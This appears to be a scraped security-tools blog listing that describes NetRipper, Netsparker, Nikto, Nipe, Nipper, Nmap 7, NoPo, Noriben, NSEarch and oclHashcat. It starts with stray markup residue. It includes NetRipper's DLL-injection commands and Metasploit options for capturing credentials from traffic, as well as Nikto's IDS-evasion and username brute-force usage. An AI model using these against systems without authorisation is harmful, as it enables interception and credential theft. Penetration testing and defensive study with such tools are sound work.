data-blogger-escaped-quit="" data-blogger-escaped-remote="" data-blogger-escaped-ssl="" data-blogger-escaped-toolkit="" data-blogger-escaped-u.="" data-blogger-escaped-updates="" data-blogger-escaped-urls="" data-blogger-escaped-user="" data-blogger-escaped-visited="">


Screenshots





Download netool.sh

NetRipper - Smart Traffic Sniffing for Penetration Testers


NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption.

NetRipper was released at Defcon 23, Las Vegas, Nevada.

Abstract

The post-exploitation activities in a penetration test can be challenging if the tester has low-privileges on a fully patched, well configured Windows machine. This work presents a technique for helping the tester to find useful information by sniffing network traffic of the applications on the compromised machine, despite his low-privileged rights. Furthermore, the encrypted traffic is also captured before being sent to the encryption layer, thus all traffic (clear-text and encrypted) can be sniffed. The implementation of this technique is a tool called NetRipper which uses API hooking to do the actions mentioned above and which has been especially designed to be used in penetration tests, but the concept can also be used to monitor network traffic of employees or to analyze a malicious application.

Tested applications

NetRipper should be able to capture network traffic from: Putty, WinSCP, SQL Server Management Studio, Lync (Skype for Business), Microsoft Outlook, Google Chrome, Mozilla Firefox. The list is not limited to these applications but other tools may require special support.

Components
NetRipper.exe - Configures and inject the DLL  
DLL.dll       - Injected DLL, hook APIs and save data to files  
netripper.rb  - Metasploit post-exploitation module

Command line
Injection: NetRipper.exe DLLpath.dll processname.exe  
Example:   NetRipper.exe DLL.dll firefox.exe  

Generate DLL:

  -h,  --help          Print this help message  
  -w,  --write         Full path for the DLL to write the configuration data  
  -l,  --location      Full path where to save data files (default TEMP)  

Plugins:

  -p,  --plaintext     Capture only plain-text data. E.g. true  
  -d,  --datalimit     Limit capture size per request. E.g. 4096  
  -s,  --stringfinder  Find specific strings. E.g. user,pass,config  

Example: NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass  

Metasploit module
msf > use post/windows/gather/netripper 
msf post(netripper) > show options

Module options (post/windows/gather/netripper):

   Name          Current Setting                  Required  Description
   ----          ---------------                  --------  -----------
   DATALIMIT     4096                             no        The number of bytes to save from requests/responses
   DATAPATH      TEMP                             no        Where to save files. E.g. C:\Windows\Temp or TEMP
   PLAINTEXT     true                             no        True to save only plain-text data
   PROCESSIDS                                     no        Process IDs. E.g. 1244,1256
   PROCESSNAMES                                   no        Process names. E.g. firefox.exe,chrome.exe
   SESSION                                        yes       The session to run this module on.
   STRINGFINDER  user,login,pass,database,config  no        Search for specific strings in captured data
Set PROCESSNAMES and run.

Metasploit installation (Kali)
  1. cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb
  2. mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
  3. g++ -Wall netripper.cpp -o netripper
  4. cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper
  5. cd ../Release
  6. cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll

PowerShell module

@HarmJ0y Added Invoke-NetRipper.ps1 PowerShell implementation of NetRipper.exe

Plugins
  1. PlainText - Allows to capture only plain-text data
  2. DataLimit - Save only first bytes of requests and responses
  3. Stringinder - Find specific string in network traffic

Download NetRipper

Netsparker 4 - Easier to Use, More Automation and Much More Web Security Checks


Netsparker Web Application Security Scanner version 4. The main highlight of this new version is the new fully automated Form Authentication mechanism; it does not require you to record anything, supports 2 factor authentication and other authentication mechanisms that require a one time code to work out of the box.

The below is a list of features highlights of the new Netsparker Web Application Security Scanner version 4.

Configuring New Web Application Security Scans Just Got Easier

This is the first thing you will notice when you launch the new version of Netsparker Desktop; a more straightforward and easier to use New Scan dialog. Easy to use software has become synonymous with Netsparker’s scanners and in this version we raised the bar again, giving the opportunity to many users to launch web security scans even if they are not that familiar with web application security.



As seen in the above screenshot all the generic scan settings you need are ergonomically placed in the right position, allowing you to quickly configure a new web application security scan. All of the advanced scan settings, such as HTTP connection options have been moved to scan policies.

Revamped Form Authentication Support to Scan Password Protected Areas

The new fully automated form authentication mechanism of Netsparker Desktop emulates a real user login, therefore even if tokens or other one time parameters are used by the web application an out of the box installation of the scanner can still login in to the password protected area and scan it. For example in the below example Netsparker is being used to login to the MailChimp website.


Once you enter the necessary details, mainly the login form URL and credentials you can click Verify Login & Logout to verify that the scanner can automatically login and identify a logged in session, as shown in the below screenshot.


You do not have to record any login macros because the new mechanism is all based on DOM. You just have to enter the login form URL, username and password and it will automatically login to the password protected section. We have tested the new automated form authentication mechanism on more than 300 live websites and can confirm that while using an out of the box setup, it works on 85% of the websites. 13% of the remaining edge cases can be fixed by writing 2-5 lines of JavaScript code with Netsparker’s new JavaScript custom script support. Pretty neat, don’t you think? The below are just a few of the login forms we tested.



The new Form Authentication mechanism also supports custom scripts which can be used to override the scanner’s behaviour, or in rare cases where the automated login button detection is not working. The custom scripting language has been changed to JavaScript because it is easier and many more users are familiar with it.

Out of the Box Support for Two-Factor Authentication and One Time Passwords

The new Form Authentication mechanism of Netsparker Desktop can also be used to automatically scan websites which use two-factor authentication or any other type of one time passwords technologies. Very simple to configure; specify the login form URL, username and passwords and tick the option Interactive Login so a browser window automatically prompts allowing you to enter the third authentication factor during a web application security scan.



Ability to Emulate Different User Roles During a Scan

To ensure that all possible vulnerabilities in a password protected area are identified, you should scan it using different users that have different roles and privileges. With the new form authentication mechanism of Netsparker you can do just that! When configuring the authentication details specify multiple usernames and passwords so in between scans you just have to select which credentials should be used without the need to record any new login macros or reconfiguring the scanner.





Automatically Identify Vulnerabilities in Google Web Toolkit Applications

Google Web Toolkit, also known as GWT is an open source framework that gained a lot of popularity. Nowadays many web applications are being built on it, or using features and functions from it. Since the web applications that are built with GWT heavily depend on complex JavaScript, we built a dedicated engine in Netsparker to support GWT.

This means that you can use Netsparker Desktop to automatically crawl, scan and identify vulnerabilities and security flaws in Google Web Toolkit applications.



Identify Vulnerabilities in File Upload Forms

Like with every version or build of Netsparker we release, we included a number of new security checks in this version. Though one specific web application security check that is included in this version needs more attention that the others; file upload forms vulnerabilities.

From this version onwards Netsparker Desktop will check all the file upload forms on your websites for vulnerabilities such forms are typically susceptible for, for example Netsparker tests that all proper validation checks in a file upload form work and that they cannot be bypassed by malicious attackers.



Mixed Content Type, Cross-Frame Options, CORS configuration

We also added various new web security checks mostly around HTML5 security headers. For example Netsparker now checks for X-Frame-Options usage, and possible problems in the implementation of it which can lead to Clickjacking vulnerabilities and some other security issues.

Another new check is checking the configuration of CORS headers. Finally in this category we added Mixed Content Type checks for HTTPS pages and Content Type header analysis for all of the pages.

XML External Entity (XXE) Engine

Applications that deal with XML data are particularly susceptible to XML External Entity (XXE) attacks. A successful exploitation of a XXE vulnerability allows an attacker to launch other and more grievous malicious attacks, such as code execution. Since this version, Netsparker automatically checks websites and web applications for XXE vulnerabilities.

Insecure JSONP Endpoints - Rosetta Flash & Reflected File Download Attacks

In this version we added a new security check to identify insecure JSONP endpoints and other controllable endpoints that can lead to Rosetta Flash or Reflected File Download attacks.

Even if your application is not using JSONP you can be still vulnerable to these type of attacks in other forms, hence why it is always important to scan your website with Netsparker.

Other Netsparker Desktop 4 Features and Product Improvements



The above list just highlights the most prominent features and new security checks of Netsparker Desktop version 4, the only false positive free web application security scanner. Included in this version there are also more new security checks and we also improved several existing security checks, hence the scanner’s coverage is better than ever before. Of course we also included a number of product improvements.
Since there have been a good number of improvements and changes in this version there are also some things from older versions of Netsparker which are no longer supported, such as scan profiles. Because we changed the way Netsparker saves the scan profiles, scan profiles generated with older versions of Netsparker will no longer work. Therefore I recommend you to check the Netsparker Desktop version 4 changelog for more information on what is new, changed and improved.


Netsparker Cloud - Online Web Application Security Scanner



Netsparker Cloud is an online web application security scanner built around the advanced scanning technology of Netsparker Web Application Security Scanner; the only false positive free automated desktop based web vulnerability scanner.

Benefit from the Cloud

AFFORDABLE AND MAINTENANCE FREE WEB APPLICATION SECURITY SOLUTION

Embrace the benefits of the cloud! With Netsparker Cloud you do not need to buy, license, install and support any hardware or software. Simply pay a yearly fee and launch as many web application security scans as you want from anywhere using the web based portal.

SCALABLE AND ALWAYS AVAILABLE: SCAN AS MANY WEBSITES AS YOU WANT WHEN YOU WANT

Netsparker Cloud enables you to launch as many web application security and vulnerability scans as you want within just minutes, thus allowing you to boost your productivity and easily stay a step ahead of malicious attackers.

A new vulnerability such as Heartbleed or Shellshock is being exploited in the wild and you need to scan 500, or 1000 web applications in just a few hours? You have new web applications that you need to add to your extensive scanning program? No need to setup any additional hardware and software or call in an emergency team, just login to Netsparker Cloud web portal and launch the web security scans.

Other Netsparker Cloud Features Organizations Can Benefit From:
  
FULLY CONFIGURABLE ONLINE WEB VULNERABILITY SCANNER

Netsparker Cloud is fully configurable, just like the desktop version of Netsparker. You can configure every single detail of the web application security scan including scan policies, attack options, HTTP options, URL rewrite rules, authentication options and everything else.

EASILY INTEGRATE WEB SECURITY SCANNING IN YOUR SDLC

Netsparker Cloud has a web service based API that allows you to remotely trigger new web security scans and much more from anywhere and anytime. Such API enables organizations to easily integrate web application security scans in their development environment so they can launch security scans throughout every stage of the software development lifecycle.
    
TEAM AND ENTERPRISE LEVEL COLLABORATION MADE EASY

You can add multiple users with different privileges to the same Netsparker Cloud account, thus allowing everyone in the organization to easily collaborate and share all the findings to streamline the process of securing web applications.

CORRELATED TRENDING REPORTS HELP YOU KEEP TRACK OF WEB APPLICATION PROJECTS

Web applications are constantly evolving; new features, functionality and improvements are the order of the day to ensure they continuously meet all business requirements. Though such changes also open up new security issues.

Netsparker Cloud security dashboard allows you to easily keep an eye on the state of security of all web applications while the trending reports will help you keep track of the quality of work your developers are doing. Trending reports can also help you monitor who is improving so you can better assign tasks according to each of the developer’s skills.


Nikto2 - Web Server Scanner


Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.

Nikto is not designed as a stealthy tool. It will test a web server in the quickest time possible, and is obvious in log files or to an IPS/IDS. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).

Not every check is a security problem, though most are. There are some items that are "info only" type checks that look for things that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.

Features

Here are some of the major features of Nikto. See the documentation for a full list of features and how to use them.
  • SSL Support (Unix with OpenSSL or maybe Windows with ActiveState's Perl/NetSSL)
  • Full HTTP proxy support
  • Checks for outdated server components
  • Save reports in plain text, XML, HTML, NBE or CSV
  • Template engine to easily customize reports
  • Scan multiple ports on a server, or multiple servers via input file (including nmap output)
  • LibWhisker's IDS encoding techniques
  • Easily updated via command line
  • Identifies installed software via headers, favicons and files
  • Host authentication with Basic and NTLM
  • Subdomain guessing
  • Apache and cgiwrap username enumeration
  • Mutation techniques to "fish" for content on web servers
  • Scan tuning to include or exclude entire classes of vulnerability checks
  • Guess credentials for authorization realms (including many default id/pw combos)
  • Authorization guessing handles any directory, not just the root directory
  • Enhanced false positive reduction via multiple methods: headers, page content, and content hashing
  • Reports "unusual" headers seen
  • Interactive status, pause and changes to verbosity settings
  • Save full request/response for positive tests
  • Replay saved positive requests
  • Maximum execution time per target
  • Auto-pause at a specified time
  • Checks for common "parking" sites
  • Logging to Metasploit
  • Thorough documentation

Basic usage
   Options:
       -ask+               Whether to ask about submitting updates
                               yes   Ask about each (default)
                               no    Don't ask, don't send
                               auto  Don't ask, just send
       -Cgidirs+           Scan these CGI dirs: "none", "all", or values like "/cgi/ /cgi-a/"
       -config+            Use this config file
       -Display+           Turn on/off display outputs:
                               1     Show redirects
                               2     Show cookies received
                               3     Show all 200/OK responses
                               4     Show URLs which require authentication
                               D     Debug output
                               E     Display all HTTP errors
                               P     Print progress to STDOUT
                               S     Scrub output of IPs and hostnames
                               V     Verbose output
       -dbcheck           Check database and other key files for syntax errors
       -evasion+          Encoding technique:
                               1     Random URI encoding (non-UTF8)
                               2     Directory self-reference (/./)
                               3     Premature URL ending
                               4     Prepend long random string
                               5     Fake parameter
                               6     TAB as request spacer
                               7     Change the case of the URL
                               8     Use Windows directory separator (\)
                               A     Use a carriage return (0x0d) as a request spacer
                               B     Use binary value 0x0b as a request spacer
        -Format+           Save file (-o) format:
                               csv   Comma-separated-value
                               htm   HTML Format
                               msf+  Log to Metasploit
                               nbe   Nessus NBE format
                               txt   Plain text
                               xml   XML Format
                               (if not specified the format will be taken from the file extension passed to -output)
       -Help              Extended help information
       -host+             Target host
       -IgnoreCode        Ignore Codes--treat as negative responses
       -id+               Host authentication to use, format is id:pass or id:pass:realm
       -key+              Client certificate key file
       -list-plugins      List all available plugins, perform no testing
       -maxtime+          Maximum testing time per host
       -mutate+           Guess additional file names:
                               1     Test all files with all root directories
                               2     Guess for password file names
                               3     Enumerate user names via Apache (/~user type requests)
                               4     Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
                               5     Attempt to brute force sub-domain names, assume that the host name is the parent domain
                               6     Attempt to guess directory names from the supplied dictionary file
       -mutate-options    Provide information for mutates
       -nointeractive     Disables interactive features
       -nolookup          Disables DNS lookups
       -nossl             Disables the use of SSL
       -no404             Disables nikto attempting to guess a 404 page
       -output+           Write output to this file ('.' for auto-name)
       -Pause+            Pause between tests (seconds, integer or float)
       -Plugins+          List of plugins to run (default: ALL)
       -port+             Port to use (default 80)
       -RSAcert+          Client certificate file
       -root+             Prepend root value to all requests, format is /directory
       -Save              Save positive responses to this directory ('.' for auto-name)
       -ssl               Force ssl mode on port
       -Tuning+           Scan tuning:
                               1     Interesting File / Seen in logs
                               2     Misconfiguration / Default File
                               3     Information Disclosure
                               4     Injection (XSS/Script/HTML)
                               5     Remote File Retrieval - Inside Web Root
                               6     Denial of Service
                               7     Remote File Retrieval - Server Wide
                               8     Command Execution / Remote Shell
                               9     SQL Injection
                               0     File Upload
                               a     Authentication Bypass
                               b     Software Identification
                               c     Remote Source Inclusion
                               x     Reverse Tuning Options (i.e., include all except specified)
       -timeout+          Timeout for requests (default 10 seconds)
       -Userdbs           Load only user databases, not the standard databases
                               all   Disable standard dbs and load only user dbs
                               tests Disable only db_tests and load udb_tests
       -until             Run until the specified time or duration
       -update            Update databases and plugins from CIRT.net
       -useproxy          Use the proxy defined in nikto.conf
       -Version           Print plugin and database versions
       -vhost+            Virtual host (for Host header)
              + requires a value

Basic Testing

The most basic Nikto scan requires simply a host to target, since port 80 is assumed if none is specified. The host can either be an IP or a hostname of a machine, and is specified using the -h (-host) option. This will scan the IP 192.168.0.1 on TCP port 80:
perl nikto.pl -h 192.168.0.1
To check on a different port, specify the port number with the -p (-port) option. This will scan the IP 192.168.0.1 on TCP port 443:
perl nikto.pl -h 192.168.0.1 -p 443
Hosts, ports and protocols may also be specified by using a full URL syntax, and it will be scanned:
perl nikto.pl -h https://192.168.0.1:443/
There is no need to specify that port 443 may be SSL, as Nikto will first test regular HTTP and if that fails, HTTPS. If you are sure it is an SSL server, specifying -s (-ssl) will speed up the test.
perl nikto.pl -h 192.168.0.1 -p 443 -ssl
More complex tests can be performed using the -mutate parameter, as detailed later. This can produce extra tests, some of which may be provided with extra parameters through the -mutate-options parameter. For example, using -mutate 3, with or without a file attempts to brute force usernames if the web server allows ~user URIs:
perl nikto.pl -h 192.168.0.1 -mutate 3 -mutate-options user-list.txt

Multiple Port Testing

Nikto can scan multiple ports in the same scanning session. To test more than one port on the same host, specify the list of ports in the -p (-port) option. Ports can be specified as a range (i.e., 80-90), or as a comma-delimited list, (i.e., 80,88,90). This will scan the host on ports 80, 88 and 443.
perl nikto.pl -h 192.168.0.1 -p 80,88,443


Download Nikto2

Nipe - Script To Redirect All Traffic From The Machine To The Tor Network

Script to redirect all the traffic from the machine to the Tor network.
    [+] AUTOR:        Vinicius Gouvea
    [+] EMAIL:        vini@inploit.com
    [+] BLOG:         https://medium.com/viniciusgouvea
    [+] GITHUB:       https://github.com/HeitorG
    [+] FACEBOOK:     https://fb.com/viniciushgouvea


Installing:
git clone https://github.com/HeitorG/nipe
cd nipe
cpan install  strict warnings Switch

Commands:
COMMAND          FUNCTION
install          For install.
start            To start
stop             To stop

Tested on:
  • Ubuntu 14.10 and 15.04
  • Busen Labs Hydrogen
  • Debian Jessie 8.1 and Wheezy 7.9
  • Lubuntu 15.04
  • Xubuntu 15.04
  • LionSec 3.0

Download Nipe

Nipper - Toolkit Web Scan for Android


La Primera herramienta de escáner de vulnerabilidades WEB, En entorno Android (Versión para iOS en desarrollo), este escáner de vulnerabilidad fue enfocado para CMS más usadas, (WordPress, Drupal, Joomla. Blogger ).

En su primera versión Nipper cuenta con 10 módulos distintos, para recopilar información acerca de un URL en específica.

Su interfaz ha sido pensada para que tan solo con unos “toques” en su interfaz extraerías gran parte de su información.

Módulos Disponibles:
  • IP Server
  • CMS Detect & Version
  • DNS Lookup
  • Nmap ports IP SERVER
  • Enumeration Users
  • Enumeration Plugins
  • Find Exploit Core CMS
  • Find Exploit DB
  • CloudFlare Resolver
Nipper NO requiere ROOT, tan solo requiere permiso a internet.
Compatible desde 2.3 a Android L.


Download Nipper

Nmap 7 - Security Scanner For Network Exploration & Security Audits


Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for network inventory, managing service upgrade schedules, monitoring host or service uptime, and many other tasks. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

Nmap was named “Security Product of the Year” by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in nineteen movies and TV series, including The Matrix Reloaded, The Bourne Ultimatum. Girl with the Dragon Tattoo, Dredd, Elysium, and Die Hard 4. Nmap was released to the public in 1997 and has earned the trust of millions of users.

Top 7 Improvements in Nmap 7

Before we get into the detailed changes, here are the top 7 improvements in Nmap 7:
1. Major Nmap Scripting Engine (NSE) Expansion
As the Nmap core has matured, more and more new functionality is developed as part of our NSE subsystem instead. In fact, we've added 171 new scripts and 20 libraries since Nmap 6. Exmaples include firewall-bypass, supermicro-ipmi-conf, oracle-brute-stealth, and ssl-heartbleed. And NSE is now powerful enough that scripts can take on core functions such as host discovery (dns-ip6-arpa-scan), version scanning (ike-version, snmp-info, etc.), and RPC grinding (rpc-grind). There's even a proposal to implement port scanning in NSE. [More Details]

2. Mature IPv6 support
IPv6 scanning improvements were a big item in the Nmap 6 release, but Nmap 7 outdoes them all with full IPv6 support for CIDR-style address ranges, Idle Scan, parallel reverse-DNS, and more NSE script coverage. [More Details]

3. Infrastructure Upgrades
We may be an 18-year-old project, but that doesn't mean we'll stick with old, crumbling infrastructure! The Nmap Project continues to adopt the latest technologies to enhance the development process and serve a growing user base. For example, we converted all of Nmap.Org to SSL to reduce the risk of trojan binaries and reduce snooping in general. We've also been using the Git version control system as a larger part of our workflow and have an official Github mirror of the Nmap Subversion source repository and we encourage code submissions to be made as Github pull requests. We also created an official bug tracker which is also hosted on Github. Tracking bugs and enhancement requests this way has already reduced the number which fall through the cracks. [More Details]

4. Faster Scans
Nmap has continually pushed the speed boundaries of synchronous network scanning for 18 years, and this release is no exception. New Nsock engines give a performance boost to Windows and BSD systems, target reordering prevents a nasty edge case on multihomed systems, and NSE tweaks lead to much faster -sV scans. [More Details]

5. SSL/TLS scanning solution of choice
Transport Layer Security (TLS) and its predecessor, SSL, are the security underpinning of the web, so when big vulnerabilities like Heartbleed, POODLE, and FREAK come calling, Nmap answers with vulnerability detection NSE scripts. The ssl-enum-ciphers script has been entirely revamped to perform fast analysis of TLS deployment problems, and version scanning probes have been tweaked to quickly detect the newest TLS handshake versions. [More Details]

6. Ncat Enhanced
We are excited and proud to announce that Ncat has been adopted by the Red Hat/Fedora family of distributions as the default package to provide the "netcat" and "nc" commands! This cooperation has resulted in a lot of squashed bugs and enhanced compatibility with Netcat's options. Also very exciting is the addition of an embedded Lua interpreter for creating simple, cross-platform daemons and traffic filters.

7. Extreme Portability
Nmap is proudly cross-platform and runs on all sorts of esoteric and archaic systems. But our binary distributions have to be kept up-to-date with the latest popular operating systems. Nmap 7 runs cleanly on Windows 10 all the way back to Windows Vista. By popular request, we even built it to run on Windows XP, though we suggest those users upgrade their systems. Mac OS X is supported from 10.8 Mountain Lion through 10.11 El Capitan. Plus, we updated support for Solaris and AIX. And Linux users—you have it easy.

Download Nmap 7

NoPo - NoSQL Honeypot Framework


NoSQL-Honeypot-Framework (NoPo) is an open source honeypot for nosql databases that automates the process of detecting attackers,logging attack incidents. The simulation engines are deployed using the twisted framework.Currently the framework holds support for redis.

N.B : The framework is under development and is prone to bugs

Installation
You can download NoPo by cloning the Git repository:
git clone https://github.com/torque59/nosqlpot.git

pip install -r requirements.txt
NoPo works out of the box with Python version 2.6.x and 2.7.x on any platform.

Added Features:
  • First Ever Honeypot for NoSQL Databases
  • Support For Config Files
  • Simulates Protocol Specification as of Servers
  • Support for Redis

Usage
Get a list of basic options :
python nopo.py -h
Deploy an nosql engine:
python nopo.py -deploy redis
Deploy an nosql engine with a configuration file:
python nopo.py -deploy redis -config filename
Log commands,session to file :
python nopo.py -deploy redis -out log.out


Download NoPo

Noriben - Your Personal, Portable Malware Sandbox


Noriben is a Python-based script that works in conjunction with Sysinternals Procmon to automatically collect, analyze, and report on runtime indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities.

Noriben allows you to not only run malware similar to a sandbox, but to also log system-wide events while you manually run malware in ways particular to making it run. For example, it can listen as you run malware that requires varying command line options. Or, watch the system as you step through malware in a debugger.

Noriben only requires Sysinternals procmon.exe (or procmon64.exe) to operate. It requires no pre-filtering (though it would greatly help) as it contains numerous white list items to reduce unwanted noise from system activity.

Cool Features

If you have a folder of YARA signature files, you can specify it with the --yara option. Every new file create will be scanned against these signatures with the results displayed in the output results.

If you have a VirusTotal API, place it into a file named "virustotal.api" (or embed directly in the script) to auto-submit MD5 file hashes to VT to get the number of viral results.

You can add lists of MD5s to auto-ignore (such as all of your system files). Use md5deep and throw them into a text file, use --hash to read them.

You can automate the script for sandbox-usage. Using -t to automate execution time, and --cmd "path\exe" to specify a malware file, you can automatically run malware, copy the results off, and then revert to run a new sample.

The --generalize feature will automatically substitute absolute paths with Windows environment paths for better IOC development. For example, C:\Users\malware_user\AppData\Roaming\malware.exe will be automatically resolved to %AppData%\malware.exe.

Usage:
--===[ Noriben v1.6 ]===--
--===[   @bbaskin   ]===--

usage: Noriben.py [-h] [-c CSV] [-p PML] [-f FILTER] [--hash HASH]
                  [-t TIMEOUT] [--output OUTPUT] [--yara YARA] [--generalize]
                  [--cmd CMD] [-d]

optional arguments:
  -h, --help            show this help message and exit
  -c CSV, --csv CSV     Re-analyze an existing Noriben CSV file
  -p PML, --pml PML     Re-analyze an existing Noriben PML file
  -f FILTER, --filter FILTER
                        Specify alternate Procmon Filter PMC
  --hash HASH           Specify MD5 file whitelist
  -t TIMEOUT, --timeout TIMEOUT
                        Number of seconds to collect activity
  --output OUTPUT       Folder to store output files
  --yara YARA           Folder containing YARA rules
  --generalize          Generalize file paths to their environment variables.
                        Default: True
  --cmd CMD             Command line to execute (in quotes)
  -d                    Enable debug tracebacks


Download Noriben

NSEarch - Nmap Script Engine Search


NSEarch is a tool that helps you find scripts that are used nmap (NSE) , can be searched using the name or category , it is also possible to see the documentation of the scripts found.

USAGE:
  $ python nsearch.py

Main Menu

Initial Setup
 ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_ \
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
 ================================================
   Version 0.3     |   @jjtibaquira
 ================================================

  Creating Database :nmap_scripts.sqlite3
  Creating Table For Script ....
  Creating Table for Categories ....
  Creating Table for Scripts per Category ....
  Upload Categories to Categories Table ...

Main Console
  ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_  |
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.3     |   @jjtibaquira
  ================================================

  nsearch>

Basic Commands
  ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_  |
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.3     |   @jjtibaquira
  ================================================

  nsearch> help

  Nsearch Commands
  ================
  clear  doc  exit  help  history  last  search

  nsearch>
  ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_  |
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.3     |   @jjtibaquira
  ================================================

  nsearch> help search

  name     : Search by script's name
  category : Search by category
  Usage:
    search name:http
    search category:exploit

  nsearch>
  ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_  |
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.3     |   @jjtibaquira
  ================================================

  nsearch> search name:ssh
  1.ssh-hostkey.nse
  2.ssh2-enum-algos.nse
  3.sshv1.nse
  nsearch>
  ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_  |
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.3     |   @jjtibaquira
  ================================================

  nsearch> doc ssh <TAB>
  ssh-hostkey.nse      ssh2-enum-algos.nse  sshv1.nse
  nsearch> doc sshv1.nse
  local nmap = require "nmap"
  local shortport = require "shortport"
  local string = require "string"

  description = [[
    Checks if an SSH server supports the obsolete and less secure SSH Protocol Version 1.
  ]]
  author = "Brandon Enright"
  nsearch>


Download NSEarch

oclHashcat v2.01 - Worlds Fastest Password Cracker


oclHashcat is the world's fastest and most advanced GPGPU-based password recovery utility, supporting five unique modes of attack for over 170 highly-optimized hashing algorithms. oclHashcat currently supports AMD (OpenCL) and Nvidia (CUDA) graphics processors on GNU/Linux and Windows 7/8/10, and has facilities to help enable distributed password cracking.

Features

  • Worlds fastest password cracker
  • Worlds first and only GPGPU based rule engine
  • Free
  • Open-Source
  • Multi-GPU (up to 128 gpus)
  • Multi-Hash (up to 100 million hashes)
  • Multi-OS (Linux & Windows native binaries)
  • Multi-Platform (OpenCL & CUDA support)
  • Multi-Algo (see below)
  • Low resource utilization, you can still watch movies or play games while cracking
  • Focuses highly iterated modern hashes
  • Focuses dictionary based attacks
  • Supports distributed cracking
  • Supports pause / resume while cracking
  • Supports sessions
  • Supports restore
  • Supports reading words from file
  • Supports reading words from stdin
  • Supports hex-salt
  • Supports hex-charset
  • Built-in benchmarking system
  • Integrated thermal watchdog
  • ... and much more

Attack-Modes

  • Straight *
  • Combination
  • Brute-force
  • Hybrid dict + mask
  • Hybrid mask + dict
* accept Rules

Algorithms

  • MD4
  • MD5
  • Half MD5 (left, mid, right)
  • SHA1
  • SHA-256
  • SHA-384
  • SHA-512
  • SHA-3 (Keccak)
  • SipHash
  • RipeMD160
  • Whirlpool
  • GOST R 34.11-94
  • GOST R 34.11-2012 (Streebog) 256-bit
  • GOST R 34.11-2012 (Streebog) 512-bit
  • Double MD5
  • Double SHA1
  • md5($pass.$salt)
  • md5($salt.$pass)
  • md5(unicode($pass).$salt)
  • md5($salt.unicode($pass))
  • md5(sha1($pass))
  • md5($salt.md5($pass))
  • md5($salt.$pass.$salt)
  • md5(strtoupper(md5($pass)))
  • sha1($pass.$salt)
  • sha1($salt.$pass)
  • sha1(unicode($pass).$salt)
  • sha1($salt.unicode($pass))
  • sha1(md5($pass))
  • sha1($salt.$pass.$salt)
  • sha256($pass.$salt)
  • sha256($salt.$pass)
  • sha256(unicode($pass).$salt)
  • sha256($salt.unicode($pass))
  • sha512($pass.$salt)
  • sha512($salt.$pass)
  • sha512(unicode($pass).$salt)
  • sha512($salt.unicode($pass))
  • HMAC-MD5 (key = $pass)
  • HMAC-MD5 (key = $salt)
  • HMAC-SHA1 (key = $pass)
  • HMAC-SHA1 (key = $salt)
  • HMAC-SHA256 (key = $pass)
  • HMAC-SHA256 (key = $salt)
  • HMAC-SHA512 (key = $pass)
  • HMAC-SHA512 (key = $salt)
  • PBKDF2-HMAC-MD5
  • PBKDF2-HMAC-SHA1
  • PBKDF2-HMAC-SHA256
